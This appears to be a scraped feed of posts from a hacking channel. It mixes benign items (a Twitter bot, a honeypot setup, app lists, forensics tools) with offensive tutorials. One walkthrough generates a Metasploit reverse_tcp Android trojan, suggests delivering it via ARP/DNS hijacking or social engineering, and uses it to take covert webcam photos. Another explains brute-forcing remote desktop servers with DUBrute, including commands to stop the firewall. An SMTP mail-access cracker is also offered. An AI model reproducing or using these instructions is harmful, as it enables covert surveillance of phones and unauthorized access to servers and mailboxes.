▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TwitterBOT :

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽

Connecting to Twitter :

1) Register a Twitter account and also get its "app info".

Twitter doesn't allow you to register multiple twitter accounts on the same email address. I recommend you create a brand new email address (perhaps using Gmail) for the Twitter account. Once you register the account to that email address, wait for the confirmation email.

2) Now go here and log in as the Twitter account for your bot:

3) Fill up the form and submit.

Next once the submission completes you will be taken to a page which has the

 tab : Update details here
"Permissons" tab : Enable Read and Write
"Key and Access Token" tab : Click on Create my access token.

4) Use the generated tokens in the "Key and Access Token" tab to fill the fields under the config.js file in your app directory. It should look like this:

 = {
  consumer_key:         'blah',
  consumer_secret:      'blah',
  access_token:         'blah',
  access_token_secret:  'blah'
}

5) Update the code under bot.js , with the your values. Best of all modify the code, tinker with it.

6) Now type the following in the command line in your project directory:

node bot.js

7) Hopefully at this point you see a message like "Success! Check your bot, it should have retweeted something." Ok it won't say that, you have to code that in. Its simple as

 Check your bot, it should have retweeted something.");

8) Check the Twitter account for your bot, and it should have retweeted a tweet with the provided hashtag.

🅁🅄🄽 :

1) git clone https://github.com/nisrulz/twitterbot-nodejs.git

2) Run

npm install

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ZERO-DAY TUTORIAL :

Libemu is a library used for the detection of shellcode and x86 emulation. Libemu can draw malware inside the documents such as RTF, PDF, etc. we can use that for hostile behavior by using heuristics. This is an advanced form of a honeypot, and beginners should not try it. Dionaea is unsafe if it gets compromised by a hacker your whole system will get compromised and for this purpose, the lean install should be used, Debian and Ubuntu system are preferred.

I recommend not to use it on a system that will be used for other purposes as libraries and codes will get installed by us that may damage other parts of your system. Dionaea, on the other hand, is unsafe if it gets compromised your whole system will get compromised. For this purpose, the lean install should be used; Debian and Ubuntu systems are preferred.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

Install dependencies:
Dionaea is a composite software, and many dependencies are required by it that are not installed on other systems like Ubuntu and Debian. So we will have to install dependencies before installing Dionaea, and it can be a dull task.

For example, we need to download the following packages to begin.

1) $ sudo apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev

2) libreadline-dev libsqlite3-dev python-dev libtool automake autoconf

3) build-essential subversion git-core flex bison pkg-config libnl-3-dev

4) libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev sqlite3
A script by Andrew Michael Smith can be downloaded from Github using wget.

5) When this script is downloaded, it will install applications (SQlite) and dependencies, download and configure Dionaea then.

6) $ wget -q https://raw.github.com/andremichaelsmith/honeypot-setup-script/
master/setup.bash -O /tmp/setup.bash && bash /tmp/setup.bash

7) Choose an interface:
Dionaea will configure itself, and it will ask you to select the network interface you want the honeypot to listen on after the dependencies and applications are downloaded.

8) Configuring Dionaea:
Now honeypot is all set and running. In future tutorials, I will show you how to identify the items of the attackers, how to set up Dionaea in real times of attack to alert you,

And how to look over and capture the shellcode of the attack. We will test our attack tools and Metasploit to check if we can capture malware before placing it live online.

9) Open the Dionaea configuration file:
Open the Dionaea configuration file in this step.

$ cd /etc/dionaea

10) Vim or any text editor other than this can work. Leafpad is used in this case.

$ sudo leafpad dionaea.conf
Configure logging:
In several cases, multiple gigabytes of a log file is seen. Log error priorities should be configured, and for this purpose, scroll down the logging section of a file.

11) Services:
Dionaea is set up to run https, http, FTP, TFTP, smb, epmap, sip, mssql, and mysql

Disable Http and https because hackers are not likely to get fooled by them, and they are not vulnerable. Leave the others because they are unsafe services and can be attacked easily by hackers.


12) Start dionaea to test:
We have to run dionaea to find our new configuration. We can do this by typing:

$ sudo dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/run/dionaea.pid

13) Now we can analyze and capture malware with the help of Dionaea as it is running successfully.

enjoy❤️👍🏻
✅Darkiwiki
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁



▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑3389 blasting tool DUBrute use tutorial (graphic)

DUBrute is a powerful remote desktop (3389) password cracking software. You can use the scanning function of this accessory to automatically scan the active IP address. After the scan is completed, set the user name and the password that needs to be guessed and you can start fully automatic work . As long as your password is set well, I believe there will be great gains.
3389 is a remote desktop port. In order to make it easier to manage the server and update the resources on the server, many people often open port 3389. Use the nastat -an command to check the opening of the port. For an account, if the account password is too weak, it is easy to be blasted. Generally, the default account is Administrator, rarely admin. For too simple passwords, you can find them in the 3389 password dictionary. Let’s explain how to blast the 3389 server. The whole process of a server.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) First use IP seacher to search for an active IP segment, or search for active 3389IP segment on Baidu, followed by SYN scanning, preferably scanning under server2003 server or virtual machine, if you insist on XP To scan under the system, let XP support SYN scanning first, copy the tcpip supporting SYN patch to the C:\Windows\System32\Drives directory, and restart the SYN scan. For the newly installed server2003 system, first perform the following services Fuck.

Copy codecode show as below:

sc config LmHosts start= auto
sc config RpcLocator start= auto
sc config NtlmSsp start= auto
sc config lanmanserver start= auto
sc config SharedAccess start= disablednet start LmHosts 2>nul
net start RpcLocator 2>nul
net start NtlmSsp 2>nul
net start lanmanserver 2>nul
net stop SharedAccess >nul 2>nul//*Stop the firewall

2) Copy the IP segment under IP seach to ip.txt under SYN scanner and start scanning for a period of time. After scanning, the ips file is produced. The IP in the IPS file is the IP with port 3389 opened.

3) The following uses the DUbrute3.0 (multiple password blasting, a single password blasting below this version) tool,

4) Source means "source". Bad means "bad" Good means "good" Error means "wrong" Check means: "detection" Thread means "thread" Start means "start" Stop means "stop" Config means "configuration" Generation means "generate" About Means "About" Exit means "Exit"


5) Probably the important translation is finished. Import the 3389 IP that needs to be blasted below, and open Generation directly. After opening, you will find that there are three columns that need to be added. The first column is the IP that needs to be blasted. , We directly click File IP to import all the IPs under IPS, the second column of Login is the login account, we can directly select Add Login to add the user name, two are fine, just Administrator or Admin, of course you can also import Username dictionary, but this is slower. In the third column Password, select File pass to import our 3389 password dictionary. Finally click made to exit the interface.

6) Click Config to configure.


7) OK, start to click Start to blast, wait time, the number behind Good indicates how many servers we have successfully blasted, Bad indicates that the bad ones are in Check, we can find the Good document under DUbrute to open, and you can see the servers that blasted successfully IP and login account password.


The tutorial is very simple, the key is to understand the principle by yourself by Undercode

enjoy❤️👍🏻
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

methode for Automating Anti-Phishing Reconnaissance Using Sender Policy Framework

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TOR VS VPN, VPN AND TOR, WHICH ONE IS BETTER :
#forBeginers

If your goal is to encrypt the transmitted data so that your Internet provider could not analyze it, then both Tor and your VPN, which you yourself set up , can come up with ! I would not recommend using any third-party VPNs, since their owner can see all the transmitted traffic + client IP (that is, your IP address). If you use a third-party VPN service, then you are guaranteed to get a spyware who, at a minimum, also knows your real IP address! If this is a paid VPN, then it is absolutely not suitable for anonymity, since the VPN service does not only know your IP and has access to all transmitted data, then it knows who you are by your payment details.

1) The self-configured OpenVPN allows you to encrypt the transmitted traffic and integrate your devices into a virtual private network. You can also hide your real IP address and bypass site blocking. But for anonymity, this option is not suitable, because for the operation of OpenVPN you need to rent a VPS, for which you have to pay. Although if you use cryptocurrency or other anonymous methods for payment, OpenVPN will help you to be anonymous.

2) Using a single proxy has the same disadvantages as a VPN: the eavesdropper + proxy service knows your real IP address. An additional drawback in the absence of encryption is that your ISP can still analyze your traffic and even block access to websites.

3) The situation with IP concealment improves if a proxy chain is used, because (depending on the settings), each next proxy knows the IP address of the previous node (always) and the IP address of 1 node before the previous one (sometimes). If we consider that traffic is not encrypted at any stage, and a certain part of public proxies is just honeypots (intended for the exploitation of users), then the proxy option is not the best way to ensure anonymity.

enjoy❤️👍🏻
#wikiresources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

fresh detailed proxies

https://pastebin.com/Xj1gB65a

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 SMTP / Mail access Cracker :
Scanner & check & send to email
You can use this tool to crack smtp
mail access
SMTP / Mail access Cracker

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣Installation Linux alt tag
1) cd Desktop

2) git clone https://github.com/aron-tn/SMTP-Mail.acess-Cracker-Checker

3) cd SMTP-Mail.acess-Cracker-Checker

4) python2 smtp.py

2️⃣Installation Android alt tag

1) Download Termux

2) git clone https://github.com/aron-tn/SMTP-Mail.acess-Cracker-Checker

3) cd SMTP-Mail.acess-Cracker-Checker

4) python2 smtp.py

3️⃣Installation Windows alt tag

1) Download cmder

2) cd Desktop

3) git clone https://github.com/aron-tn/SMTP-Mail.acess-Cracker-Checker

4) cd SMTP-Mail.acess-Cracker-Checker
smtp.py

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Need more checkers ?

For the US chip blockade Yu Chengdong: We are thinking of a way
#international

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ANDROID HACKING METHODE :
MSF is the abbreviation of Metasploit. Metasploit is an open source security vulnerability detection tool. It is very powerful. There are Windows and Linux versions. The tool integrates many vulnerabilities announced by Microsoft (0day).

The system I tested here is Backbox linux, which is a network penetration and information security assessment system. Many tools are installed inside. MSF comes with it. Of course there are others such as Kali linux, Back Track, etc.

Environment: Backbox linux+MSF

Target: an Android phone

Since it is hacking an Android phone, an Android Trojan horse must be configured first, then let’s take a look at the IP of the machine

🅁🅄🄽 :

Local IP: 192.168.XZA.XYX

1) Enter the command in the terminal: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R> /root/apk.apk

The old version of MSF used msfpayload to generate Trojans. Now msfvenom is used instead in the new version, so some friends will prompt when they enter msfpayload in the terminal.

2) msfpayload cannot find the command, so just use msfvenom, where LHOST corresponds to the IP address of the machine. LPORT corresponds to the port you want to monitor and then generates the path of the Trojan.

3) In this way, we have generated an APK Android Trojan file in the /root/ path. As for the Trojan-free killing, let's leave it alone. Now we are starting the MSF tool

Enter the command: msfconsole

🦑Then enter:

4) use exploit/multi/handler to load the module

5) set payload android/meterpreter/reverse_tcp select Payload

6) show options view parameter settings

7) We see that there are two parameters in the payload to set LHOST and LPORT, which means the address and port. The default port is 4444. Now let’s change the settings.

🅁🅄🄽 :

1) set LHOST 192.168.1.6 The address here is set to the IP address of the Trojan we just generated

2) set LPORT 5555 The port here is set to the port that we just generated the Trojan to monitor

3) The exploit starts to execute the vulnerability and starts monitoring...

OK, all preparations are ready. . . What we have to do now is to get the Trojan horse file on the other’s mobile phone. There are many ways to use DNS arp hijacking to deceive. As long as the other party downloads the file with the mobile phone, it will download our Trojan file.

4) There are social workers and so on, here I will simply put the Trojan horse file on my own phone for testing

5) After the installation is complete, a MainActivity program icon will be generated on the desktop. This is the Trojan we just generated. When we click on this icon, the phone will have no response. Its solid wood horse has started to run.

We can see in our MSF that there is a session connecteD

6) In this way, the other party’s mobile phone is controlled by us. To view the mobile phone system information, enter the command sysinfo





webcam_list Check how many camera heads there are on the phone. The two displayed here indicate that there are two front and rear cameras.



webcam_snap hidden camera function

7) Follow the parameter -i to specify which camera to take pictures

You can see that we took photos of the front and rear cameras and saved them on the desktop

You can also enter the command webcam_stream to turn on the camera

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑best apps for youtubers :

https://itunes.apple.com/app/youtube-creator-studio/id888530356

https://play.google.com/store/apps/details?id=com.octoly.app&utm_source=octomag&utm_medium=footer_medium_app&utm_campaign=bestappsforyoutube

https://itunes.apple.com/us/app/octoly/id1100218563?mt=8

https://www.apple.com/imovie/


enjoy❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Security hacking tool :
-termux/linux

F E A T U R E S :

Reconnaissance:

HTTP Header checks
HTTP enabled methods check (Cross Site Tracing)
Cookie checks (decodes base64 automatically)
Information Disclosure:

Robots.txt Analysis
.htaccess public access check
.svn/entries public access check
Microsoft IIS, internal IP disclosure check
Injection Attacks:

Error based SQL injection:

Cookie based
User-Agent based
CRLF injection:

CRLF tests on main URLs
Host header injection:

Modifying Host header
Adding X-Forwarded-Host additional header
Clickjacking:

X-FRAME-OPTIONS header check
Frame busting checks

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/a0xnirudh/WebXploiter.git

2) cd WebXploiter

3) Just run python install.py from install directory. Rest is taken care of :)

4) A sample output against localhost:

python WebXploiter.py -u "http://localhost/challs/action.php" -a

5) usage: WebXploiter.py [-h] [-u U] [-a] [-A1] [-A3]

Do a basic Recon for Web challenges

optional arguments:
-h, --help show this help message and exit
-u U, -url U Target URL to Recon
-a, -all Try all possible attacks
-A1 Test for only Injection Attacks
-A3 Test for only XSS Attacks

enjoy❤️👍🏻
git topic
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST ANDROID VIDEO EDITING APPS 2020

https://play.google.com/store/apps/details?id=com.wondershare.filmorago

https://play.google.com/store/apps/details?id=com.adobe.premiereclip

https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor

https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01

https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree

https://play.google.com/store/apps/details?id=com.stupeflix.replay

https://play.google.com/store/apps/details?
id=com.quvideo.xiaoying

https://play.google.com/store/apps/details?id=com.avcrbt.funimate

https://play.google.com/store/apps/details?id=com.magisto

https://play.google.com/store/apps/details?id=com.alivestory.android.alive

https://play.google.com/store/apps/details?id=com.funcamerastudio.videomaker


enjoy❤️👍🏻
git topic
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MULTI HACKING TOOLS 2020 TOPIC :


* [GRR Rapid Response](https://github.com/google/grr) - Incident response framework focused on remote live forensics. It consists of a python agent (client) that is installed on target systems, and a python server infrastructure that can manage and talk to the agent. Besides the included Python API client, [PowerGRR](https://github.com/swisscom/PowerGRR) provides an API client library in PowerShell working on Windows, Linux and macOS for GRR automation and scripting.


* [Kolide Fleet](https://kolide.com/fleet) - State of the art host monitoring platform tailored for security experts. Leveraging Facebook's battle-tested osquery project, Kolide delivers fast answers to big questions.


* [Limacharlie](https://github.com/refractionpoint/limacharlie) - Endpoint security platform composed of a collection of small projects all working together that gives you a cross-platform (Windows, OSX, Linux, Android and iOS) low-level environment for managing and pushing additional modules into memory to extend its functionality.


* [MozDef](https://github.com/mozilla/MozDef) - Automates the security incident handling process and
facilitate the real-time activities of incident handlers.


* [nightHawk](https://github.com/biggiesmallsAG/nightHawkResponse) - Application built for asynchronus forensic data presentation using ElasticSearch as the backend. It's designed to ingest Redline collections.


* [Open Computer Forensics Architecture](http://sourceforge.net/projects/ocfa/) - Another popular distributed open-source computer forensics framework. This framework was built on Linux platform and uses postgreSQL database for storing data.


* [osquery](https://osquery.io/) - Easily ask questions about your Linux and macOS infrastructure using a SQL-like query language; the provided *incident-response pack* helps you detect and respond to breaches.


* [Redline](https://www.fireeye.com/services/freeware/redline.html) - Provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis, and the development of a threat assessment profile.


* [The Sleuth Kit & Autopsy](http://www.sleuthkit.org) - Unix and Windows based tool which helps in forensic analysis of computers. It comes with various tools which helps in digital forensics. These tools help in analyzing disk images, performing in-depth analysis of file systems, and various other things.


* [TheHive](https://thehive-project.org/) - Scalable 3-in-1 open source and free solution designed to make life easier for SOCs, CSIRTs, CERTs and any information security practitioner dealing with security incidents that need to be investigated and acted upon swiftly.


* [X-Ways Forensics](http://www.x-ways.net/forensics/) - Forensics tool for Disk cloning and imaging. It can be used to find deleted files and disk analysis.


* [Zentral](https://github.com/zentralopensource/zentral) - Combines osquery's powerful endpoint inventory features with a flexible notification and action framework. This enables one to identify and react to changes on OS X and Linux clients.


enjoy❤️👍🏻
git topic 2020

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST FREE RDP (LIMITES TIME)

1) Amazon Web Services - EC2 (free for 12 months but 750hours/month limit) - free tier t2.micro (1core 1Gb ram) too slow to run CGB.
2) Microsoft Azure - Virtual Machines (free $200 for 1-month trial)
3) Google Cloud - Compute Engine (free $300 for 60 days trial)
4) HP Helion - Cloud Compute (free $300 for 90 days trial)

Mid-tier:
1) Rackspace - https://developer.rackspace.com/ (free $600 for 12 months!)
2) DimensionData Public Cloud - https://cloud.dimens...n/limitedoffer/ (free $100)
3) RunAbove - Intel Steadfast instances https://www.runabove.com (free 1-week trial)

Others:
1) Vultr - https://www.vultr.com/ (free $50 for 2 months trial)
2) https://www.profitbricks.com/trial (free for 14 days) - no credit card needed but you need a business email and reason for using their VPS
3) http://cloudsigma.com/ (free for 7 days) - no credit card needed!
4) Digital Ocean - www.digitalocean.com - free $10 credit with promo code: DROPLET10 or DO10 - No Windows provided but you can install it, lots of tutorials on how to do so out there
5) http://ezywatch.com/freevps/ (free for 1 month) - no credit card needed!
6) Legionhoster - VPS http://legionhoster.com (1 week trial available on request from helpdesk)
7) http://www.yellowcircle.net/ - no credit card needed! No network access was given!
8) https://www.ctl.io/free-trial/ (free $2500 or 1 month - whichever comes first)
9) https://www.ihor.ru/ (free for 3 days) - no credit card needed!
10) http://www.neuprime.com/l_vds3.php (free for 10 days trial) - phone verification required.



enjoy❤️👍🏻
FROM RANDOM FORUM
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁